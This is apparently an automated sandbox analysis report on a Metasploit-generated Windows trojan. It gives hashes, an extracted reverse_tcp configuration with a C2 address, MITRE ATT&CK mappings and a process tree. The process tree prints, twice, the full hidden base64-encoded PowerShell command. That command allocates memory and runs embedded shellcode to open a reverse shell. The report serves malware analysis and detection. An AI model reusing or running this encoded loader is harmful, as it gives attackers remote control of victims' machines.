metasploit | ca8491889201ee130cf5ae702204a2bd663fe5a42f62728361c96c0a464a56c4

General

Target

ca8491889201ee130cf5ae702204a2bd663fe5a42f62728361c96c0a464a56c4N.exe
Size

17KB
MD5

1ad437b06f6b1901d85f454faea19560
SHA1

37feefcbb97ce675a732f995fba0be4c3f9d92bf
SHA256

ca8491889201ee130cf5ae702204a2bd663fe5a42f62728361c96c0a464a56c4
SHA512

c123189fb4ab7e0c389f7c91f8762a713aeaaf49432a075886a6e58d36b0dcb47bf5314d4ae3dd462079652f973be8fe5554a2b2b80576d4dc56ce97a75e592a
SSDEEP

384:UjcjwcOkjc5lPvL/c1fcKj8cRJPxD9oXiIdhIn/PCcmL6npalkXWJPoH:Ujcjwc1jc5B/c1fcKj8chGMPCcfpBXW4

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

10.0.2.15:2222

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
400	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
400	powershell.exe
400	powershell.exe
4256	powershell.exe
4256	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	400	powershell.exe
Token: SeDebugPrivilege	4256	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 2844 wrote to memory of 4296	2844	ca8491889201ee130cf5ae702204a2bd663fe5a42f62728361c96c0a464a56c4N.exe	83
PID 2844 wrote to memory of 4296	2844	ca8491889201ee130cf5ae702204a2bd663fe5a42f62728361c96c0a464a56c4N.exe	83
PID 4296 wrote to memory of 400	4296	cmd.exe	84
PID 4296 wrote to memory of 400	4296	cmd.exe	84
PID 400 wrote to memory of 4256	400	powershell.exe	85
PID 400 wrote to memory of 4256	400	powershell.exe	85
PID 400 wrote to memory of 4256	400	powershell.exe	85
PID 4256 wrote to memory of 5048	4256	powershell.exe	86
PID 4256 wrote to memory of 5048	4256	powershell.exe	86
PID 4256 wrote to memory of 5048	4256	powershell.exe	86
PID 5048 wrote to memory of 2116	5048	csc.exe	87
PID 5048 wrote to memory of 2116	5048	csc.exe	87
PID 5048 wrote to memory of 2116	5048	csc.exe	87

C:\Users\Admin\AppData\Local\Temp\ca8491889201ee130cf5ae702204a2bd663fe5a42f62728361c96c0a464a56c4N.exe
"C:\Users\Admin\AppData\Local\Temp\ca8491889201ee130cf5ae702204a2bd663fe5a42f62728361c96c0a464a56c4N.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAB6ADUAZQB1ACAAPQAgACcAJAB0ADQAQQBXACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHQANABBAFcAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGMAOQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgAYgBmACwAMAB4ADgANQAsADAAeAA4ADkALAAwAHgAZQAyACwAMAB4AGIANAAsADAAeAA1AGEALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADAAMwAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADgAMwAsADAAeAA0ADcALAAwAHgAOABkACwAMAB4ADAAMAAsADAAeAA0ADEALAAwAHgAYgBiACwAMAB4ADYANgAsADAAeAA0AGIALAAwAHgAYQBhACwAMAB4ADQAMwAsADAAeAA3ADcALAAwAHgAMwA0ACwAMAB4ADkAYQAsADAAeAA5ADEALAAwAHgAZgBlACwAMAB4ADUAMQAsADAAeABiADgALAAwAHgAOQBlACwAMAB4ADUAMwAsADAAeABhAGEALAAwAHgAYwBhACwAMAB4AGYAMgAsADAAeAA1AGYALAAwAHgANAAxACwAMAB4ADkAZQAsADAAeABlADYALAAwAHgAZAA0ACwAMAB4ADIANwAsADAAeAAzADcALAAwAHgAMAA5ACwAMAB4ADUAYwAsADAAeAA4AGQALAAwAHgANgAxACwAMAB4ADIANAAsADAAeAA1AGQALAAwAHgAMgAzACwAMAB4AGEAZQAsADAAeABlAGEALAAwAHgAOQBkACwAMAB4ADIANQAsADAAeAA1ADIALAAwAHgAZgAwACwAMAB4AGYAMQAsADAAeAA4ADUALAAwAHgANgBiACwAMAB4ADMAYgAsADAAeAAwADQALAAwAHgAYwA3ACwAMAB4AGEAYwAsADAAeAA4AGEALAAwAHgANgAyACwAMAB4ADIAOAAsADAAeAA2ADAALAAwAHgAOAA3ACwAMAB4AGQAZgAsADAAeABhADYALAAwAHgAZAAyACwAMAB4ADEAYwAsADAAeAA5AGQALAAwAHgAZgBhACwAMAB4AGQAZAAsADAAeABmADIALAAwAHgAYQA5ACwAMAB4ADQAMwAsADAAeABhADYALAAwAHgANwA3ACwAMAB4ADYAZAAsADAAeAAzADcALAAwAHgAMQBhACwAMAB4ADcANgAsADAAeABiAGUALAAwAHgAMwAzACwAMAB4AGUAYQAsADAAeAA2ADAALAAwAHgANgBlACwAMAB4AGMAZgAsADAAeABiADMALAAwAHgAYgAwACwAMAB4ADgAZgAsADAAeAAxAGMALAAwAHgAYwA2ACwAMAB4ADcAOQAsADAAeABmAGIALAAwAHgAOQBlACwAMAB4AGYAOAAsADAAeAA4ADYALAAwAHgANABkACwAMAB4ADUANAAsADAAeABjAGUALAAwAHgAZgAzACwAMAB4ADQAZgAsADAAeABiAGMALAAwAHgAMQBlACwAMAB4AGMAMwAsADAAeABmAGMALAAwAHgAOAAxACwAMAB4AGEAZQAsADAAeABjAGUALAAwAHgAZgBkACwAMAB4AGMANgAsADAAeAAwADkALAAwAHgAMwAwACwAMAB4ADgAOAAsADAAeAAzAGMALAAwAHgANgBhACwAMAB4AGMAZAAsADAAeAA4AGIALAAwAHgAOAA2ACwAMAB4ADEAMAAsADAAeAAwADkALAAwAHgAMQA5ACwAMAB4ADEAOQAsADAAeABiADIALAAwAHgAZABhACwAMAB4AGIAOQAsADAAeABmAGQALAAwAHgANAAyACwAMAB4ADAAZgAsADAAeAA1AGYALAAwAHgANwA1ACwAMAB4ADQAOAAsADAAeABlADQALAAwAHgAMgBiACwAMAB4AGQAMQAsADAAeAA0AGQALAAwAHgAZgBiACwAMAB4AGYAOAAsADAAeAA2ADkALAAwAHgANgA5ACwAMAB4ADcAMAAsADAAeABmAGYALAAwAHgAYgBkACwAMAB4AGYAYgAsADAAeABjADIALAAwAHgAMgA0ACwAMAB4ADEAYQAsADAAeABhADcALAAwAHgAOQAxACwAMAB4ADQANQAsADAAeAAzAGIALAAwAHgAMABkACwAMAB4ADcANAAsADAAeAA3ADkALAAwAHgANQBiACwAMAB4AGUAOQAsADAAeAAyADkALAAwAHgAZABmACwAMAB4ADEANwAsADAAeAAxADgALAAwAHgAMwBjACwAMAB4ADUAZgAsADAAeABkADgALAAwAHgAZQAyACwAMAB4ADQAMQAsADAAeAAzAGQALAAwAHgANABmACwAMAB4ADIAZQAsADAAeAA4AGYALAAwAHgAYgBlACwAMAB4ADgAZgAsADAAeAAzADgALAAwAHgAOQA4ACwAMAB4AGMAZAAsADAAeABiAGQALAAwAHgAZQA3ACwAMAB4ADMAMgAsADAAeAA1AGEALAAwAHgAOABlACwAMAB4ADYAMAAsADAAeAA5AGMALAAwAHgAOQBkACwAMAB4ADgANwAsADAAeAA2ADcALAAwAHgAMQBmACwAMAB4ADcAMQAsADAAeAAyAGYALAAwAHgAZQA3ACwAMAB4AGQAZQAsADAAeAA3ADIALAAwAHgANQAwACwAMAB4ADIAMQAsADAAeAAyADQALAAwAHgAMgA2ACwAMAB4ADAAMAAsADAAeAA1ADkALAAwAHgAOABkACwAMAB4ADQANwAsADAAeABjAGIALAAwAHgAOQA5ACwAMAB4ADMAMgAsADAAeAA5ADIALAAwAHgANgA2ACwAMAB4ADkAMAAsADAAeABhADQALAAwAHgAMQA3ACwAMAB4ADcANwAsADAAeABhADYALAAwAHgAMwBiACwAMAB4ADQAMAAsADAAeAA3ADUALAAwAHgAYQA2ACwAMAB4ADQAYgAsADAAeAAzAGUALAAwAHgAZgAwACwAMAB4ADQAMAAsADAAeAAxAGIALAAwAHgANgBlACwAMAB4ADUAMwAsADAAeABkAGQALAAwAHgAZABiACwAMAB4AGQAZQAsADAAeAAxADMALAAwAHgAOABkACwAMAB4AGIAMwAsADAAeAAzADQALAAwAHgAOQBjACwAMAB4AGYAMgAsADAAeABhADMALAAwAHgAMwA2ACwAMAB4ADcANgAsADAAeAA5AGIALAAwAHgANAA5ACwAMAB4AGQAOQAsADAAeAAyAGYALAAwAHgAZgAzACwAMAB4AGUANQAsADAAeAA0ADAALAAwAHgANgBhACwAMAB4ADgAZgAsADAAeAA5ADQALAAwAHgAOABkACwAMAB4AGEAMAAsADAAeABmADUALAAwAHgAOQA2ACwAMAB4ADAANgAsADAAeAA0ADcALAAwAHgAMAA5ACwAMAB4ADUAOAAsADAAeABlAGYALAAwAHgAMgAyACwAMAB4ADEAOQAsADAAeAAwAGMALAAwAHgAMQBmACwAMAB4ADcAOQAsADAAeAA0ADMALAAwAHgAOQBhACwAMAB4ADIAMAAsADAAeAA1ADcALAAwAHgAZQBlACwAMAB4ADIAMgAsADAAeABiADUALAAwAHgANQBjACwAMAB4AGIAOQAsADAAeAA3ADUALAAwAHgAMgAxACwAMAB4ADUAZgAsADAAeAA5AGMALAAwAHgAYgAxACwAMAB4AGUAZQAsADAAeABhADAALAAwAHgAYwBiACwAMAB4AGMAYQAsADAAeAAyADcALAAwAHgAMwA1ACwAMAB4AGIANAAsADAAeABhADQALAAwAHgANAA3ACwAMAB4AGQAOQAsADAAeAAzADQALAAwAHgAMwA0ACwAMAB4ADEAZQAsADAAeABiADMALAAwAHgAMwA0ACwAMAB4ADUAYwAsADAAeABjADYALAAwAHgAZQA3ACwAMAB4ADYANgAsADAAeAA3ADkALAAwAHgAMAA5ACwAMAB4ADMAMgAsADAAeAAxAGIALAAwAHgAZAAyACwAMAB4ADkAYwAsADAAeABiAGQALAAwAHgANABhACwAMAB4ADgANwAsADAAeAAzADcALAAwAHgAZAA2ACwAMAB4ADcAMAAsADAAeABmAGUALAAwAHgANwAwACwAMAB4ADcAOQAsADAAeAA4AGEALAAwAHgAZAA1ACwAMAB4ADgAMAAsADAAeAA0ADUALAAwAHgANQBkACwAMAB4ADEAMwAsADAAeABmADcALAAwAHgAYQA3ACwAMAB4ADUAZAA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAZQBVADMAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGUAVQAzAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABlAFUAMwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAHoANQBlAHUAKQApADsAJAAyAGgAYgAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAE0AYgBnAHoAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQATQBiAGcAegAgACQAMgBoAGIAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAMgBoAGIAIAAkAGUAIgA7AH0A
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4296
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -window hidden -EncodedCommand JAB6ADUAZQB1ACAAPQAgACcAJAB0ADQAQQBXACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHQANABBAFcAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGMAOQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgAYgBmACwAMAB4ADgANQAsADAAeAA4ADkALAAwAHgAZQAyACwAMAB4AGIANAAsADAAeAA1AGEALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADAAMwAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADgAMwAsADAAeAA0ADcALAAwAHgAOABkACwAMAB4ADAAMAAsADAAeAA0ADEALAAwAHgAYgBiACwAMAB4ADYANgAsADAAeAA0AGIALAAwAHgAYQBhACwAMAB4ADQAMwAsADAAeAA3ADcALAAwAHgAMwA0ACwAMAB4ADkAYQAsADAAeAA5ADEALAAwAHgAZgBlACwAMAB4ADUAMQAsADAAeABiADgALAAwAHgAOQBlACwAMAB4ADUAMwAsADAAeABhAGEALAAwAHgAYwBhACwAMAB4AGYAMgAsADAAeAA1AGYALAAwAHgANAAxACwAMAB4ADkAZQAsADAAeABlADYALAAwAHgAZAA0ACwAMAB4ADIANwAsADAAeAAzADcALAAwAHgAMAA5ACwAMAB4ADUAYwAsADAAeAA4AGQALAAwAHgANgAxACwAMAB4ADIANAAsADAAeAA1AGQALAAwAHgAMgAzACwAMAB4AGEAZQAsADAAeABlAGEALAAwAHgAOQBkACwAMAB4ADIANQAsADAAeAA1ADIALAAwAHgAZgAwACwAMAB4AGYAMQAsADAAeAA4ADUALAAwAHgANgBiACwAMAB4ADMAYgAsADAAeAAwADQALAAwAHgAYwA3ACwAMAB4AGEAYwAsADAAeAA4AGEALAAwAHgANgAyACwAMAB4ADIAOAAsADAAeAA2ADAALAAwAHgAOAA3ACwAMAB4AGQAZgAsADAAeABhADYALAAwAHgAZAAyACwAMAB4ADEAYwAsADAAeAA5AGQALAAwAHgAZgBhACwAMAB4AGQAZAAsADAAeABmADIALAAwAHgAYQA5ACwAMAB4ADQAMwAsADAAeABhADYALAAwAHgANwA3ACwAMAB4ADYAZAAsADAAeAAzADcALAAwAHgAMQBhACwAMAB4ADcANgAsADAAeABiAGUALAAwAHgAMwAzACwAMAB4AGUAYQAsADAAeAA2ADAALAAwAHgANgBlACwAMAB4AGMAZgAsADAAeABiADMALAAwAHgAYgAwACwAMAB4ADgAZgAsADAAeAAxAGMALAAwAHgAYwA2ACwAMAB4ADcAOQAsADAAeABmAGIALAAwAHgAOQBlACwAMAB4AGYAOAAsADAAeAA4ADYALAAwAHgANABkACwAMAB4ADUANAAsADAAeABjAGUALAAwAHgAZgAzACwAMAB4ADQAZgAsADAAeABiAGMALAAwAHgAMQBlACwAMAB4AGMAMwAsADAAeABmAGMALAAwAHgAOAAxACwAMAB4AGEAZQAsADAAeABjAGUALAAwAHgAZgBkACwAMAB4AGMANgAsADAAeAAwADkALAAwAHgAMwAwACwAMAB4ADgAOAAsADAAeAAzAGMALAAwAHgANgBhACwAMAB4AGMAZAAsADAAeAA4AGIALAAwAHgAOAA2ACwAMAB4ADEAMAAsADAAeAAwADkALAAwAHgAMQA5ACwAMAB4ADEAOQAsADAAeABiADIALAAwAHgAZABhACwAMAB4AGIAOQAsADAAeABmAGQALAAwAHgANAAyACwAMAB4ADAAZgAsADAAeAA1AGYALAAwAHgANwA1ACwAMAB4ADQAOAAsADAAeABlADQALAAwAHgAMgBiACwAMAB4AGQAMQAsADAAeAA0AGQALAAwAHgAZgBiACwAMAB4AGYAOAAsADAAeAA2ADkALAAwAHgANgA5ACwAMAB4ADcAMAAsADAAeABmAGYALAAwAHgAYgBkACwAMAB4AGYAYgAsADAAeABjADIALAAwAHgAMgA0ACwAMAB4ADEAYQAsADAAeABhADcALAAwAHgAOQAxACwAMAB4ADQANQAsADAAeAAzAGIALAAwAHgAMABkACwAMAB4ADcANAAsADAAeAA3ADkALAAwAHgANQBiACwAMAB4AGUAOQAsADAAeAAyADkALAAwAHgAZABmACwAMAB4ADEANwAsADAAeAAxADgALAAwAHgAMwBjACwAMAB4ADUAZgAsADAAeABkADgALAAwAHgAZQAyACwAMAB4ADQAMQAsADAAeAAzAGQALAAwAHgANABmACwAMAB4ADIAZQAsADAAeAA4AGYALAAwAHgAYgBlACwAMAB4ADgAZgAsADAAeAAzADgALAAwAHgAOQA4ACwAMAB4AGMAZAAsADAAeABiAGQALAAwAHgAZQA3ACwAMAB4ADMAMgAsADAAeAA1AGEALAAwAHgAOABlACwAMAB4ADYAMAAsADAAeAA5AGMALAAwAHgAOQBkACwAMAB4ADgANwAsADAAeAA2ADcALAAwAHgAMQBmACwAMAB4ADcAMQAsADAAeAAyAGYALAAwAHgAZQA3ACwAMAB4AGQAZQAsADAAeAA3ADIALAAwAHgANQAwACwAMAB4ADIAMQAsADAAeAAyADQALAAwAHgAMgA2ACwAMAB4ADAAMAAsADAAeAA1ADkALAAwAHgAOABkACwAMAB4ADQANwAsADAAeABjAGIALAAwAHgAOQA5ACwAMAB4ADMAMgAsADAAeAA5ADIALAAwAHgANgA2ACwAMAB4ADkAMAAsADAAeABhADQALAAwAHgAMQA3ACwAMAB4ADcANwAsADAAeABhADYALAAwAHgAMwBiACwAMAB4ADQAMAAsADAAeAA3ADUALAAwAHgAYQA2ACwAMAB4ADQAYgAsADAAeAAzAGUALAAwAHgAZgAwACwAMAB4ADQAMAAsADAAeAAxAGIALAAwAHgANgBlACwAMAB4ADUAMwAsADAAeABkAGQALAAwAHgAZABiACwAMAB4AGQAZQAsADAAeAAxADMALAAwAHgAOABkACwAMAB4AGIAMwAsADAAeAAzADQALAAwAHgAOQBjACwAMAB4AGYAMgAsADAAeABhADMALAAwAHgAMwA2ACwAMAB4ADcANgAsADAAeAA5AGIALAAwAHgANAA5ACwAMAB4AGQAOQAsADAAeAAyAGYALAAwAHgAZgAzACwAMAB4AGUANQAsADAAeAA0ADAALAAwAHgANgBhACwAMAB4ADgAZgAsADAAeAA5ADQALAAwAHgAOABkACwAMAB4AGEAMAAsADAAeABmADUALAAwAHgAOQA2ACwAMAB4ADAANgAsADAAeAA0ADcALAAwAHgAMAA5ACwAMAB4ADUAOAAsADAAeABlAGYALAAwAHgAMgAyACwAMAB4ADEAOQAsADAAeAAwAGMALAAwAHgAMQBmACwAMAB4ADcAOQAsADAAeAA0ADMALAAwAHgAOQBhACwAMAB4ADIAMAAsADAAeAA1ADcALAAwAHgAZQBlACwAMAB4ADIAMgAsADAAeABiADUALAAwAHgANQBjACwAMAB4AGIAOQAsADAAeAA3ADUALAAwAHgAMgAxACwAMAB4ADUAZgAsADAAeAA5AGMALAAwAHgAYgAxACwAMAB4AGUAZQAsADAAeABhADAALAAwAHgAYwBiACwAMAB4AGMAYQAsADAAeAAyADcALAAwAHgAMwA1ACwAMAB4AGIANAAsADAAeABhADQALAAwAHgANAA3ACwAMAB4AGQAOQAsADAAeAAzADQALAAwAHgAMwA0ACwAMAB4ADEAZQAsADAAeABiADMALAAwAHgAMwA0ACwAMAB4ADUAYwAsADAAeABjADYALAAwAHgAZQA3ACwAMAB4ADYANgAsADAAeAA3ADkALAAwAHgAMAA5ACwAMAB4ADMAMgAsADAAeAAxAGIALAAwAHgAZAAyACwAMAB4ADkAYwAsADAAeABiAGQALAAwAHgANABhACwAMAB4ADgANwAsADAAeAAzADcALAAwAHgAZAA2ACwAMAB4ADcAMAAsADAAeABmAGUALAAwAHgANwAwACwAMAB4ADcAOQAsADAAeAA4AGEALAAwAHgAZAA1ACwAMAB4ADgAMAAsADAAeAA0ADUALAAwAHgANQBkACwAMAB4ADEAMwAsADAAeABmADcALAAwAHgAYQA3ACwAMAB4ADUAZAA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAZQBVADMAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGUAVQAzAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABlAFUAMwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAHoANQBlAHUAKQApADsAJAAyAGgAYgAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAE0AYgBnAHoAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQATQBiAGcAegAgACQAMgBoAGIAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAMgBoAGIAIAAkAGUAIgA7AH0A
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:400
